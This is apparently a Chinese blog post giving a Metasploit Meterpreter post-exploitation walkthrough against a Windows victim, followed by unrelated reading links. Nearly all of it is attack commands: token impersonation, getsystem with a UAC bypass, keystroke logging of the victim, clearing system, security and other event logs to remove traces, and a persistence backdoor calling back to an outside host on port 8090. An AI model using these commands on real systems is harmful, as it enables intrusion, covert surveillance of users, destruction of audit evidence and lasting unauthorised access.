zoukankan      html  css  js  c++  java
  • kalilinux-权限提升

    meterpeter:
    1. 可以在 Meterpreter 使用 incognito 来开始模拟过程:
      use incognito
    2. 展示 incognito 的帮助文档,通过输入 help 命令:
      help
    3. 获得可用用户的列表
      list_tokens –u
    4. 模拟攻击
      impersonate_token willie-pcwillie

    本地提权攻击:
    getsystem

    如果你尝试获得 Windows 7 主机的访问,你必须在执行 getsystem 命令之前执
    行 bypassuac 。 bypassuac 允许你绕过微软的用户账户控制。这个命令这样运
    行: run post/windows/escalate/bypassuac 。


    收集受害者数据:
    keyscan_start
    keyscan_dump
    也可以使用 Wireshark 或
    airodump-ng 来更简单地收集数据。


    清理踪迹:

    1. 运行 IRB,以便进行日志移除操作。我们打开帮助文件:
      irb
    2. 下面,我们告诉 IRB 要移除哪个文件。下面是一个可用的选择:
      log = client.sys.eventlog.open('system')
      log = client.sys.eventlog.open('security')
      log = client.sys.eventlog.open('application')
      log = client.sys.eventlog.open('directory service')
      log = client.sys.eventlog.open('dns server')
      log = client.sys.eventlog.open('file replication service')
    3. 出于我们的目的,我们把它们都清理掉。你需要将这些一次键入:
      log = client.sys.eventlog.open('system')
      log = client.sys.eventlog.open('security')
      log = client.sys.eventlog.open('application')
      log = client.sys.eventlog.open('directory service')
      log = client.sys.eventlog.open('dns server')
      log = client.sys.eventlog.open('file replication service')
    4. 现在我们执行命令来清理日志文件:
      Log.clear

    创建永久后门:
    run persistence –h

    现在,我们执行命令来建立后门:
    run persistence –U –A –i 10 – 8090 –r 192.168.10.109

    后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    HDU 1160 dp中的路径问题
    zzuli 1907: 小火山的宝藏收益
    POJ 3414 dfs广搜直接应用
    http://acm.zzuli.edu.cn/zzuliacm/problem.php?cid=1158&pid=5 二分函数的间接应用
    LightOJ 1067 组合数取模
    九段美到极致的句子
    质数和分解
    codevs 1080 线段树练习
    codevs 2806 红与黑
    codevs 2152 滑雪
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6394294.html
Copyright © 2011-2022 走看看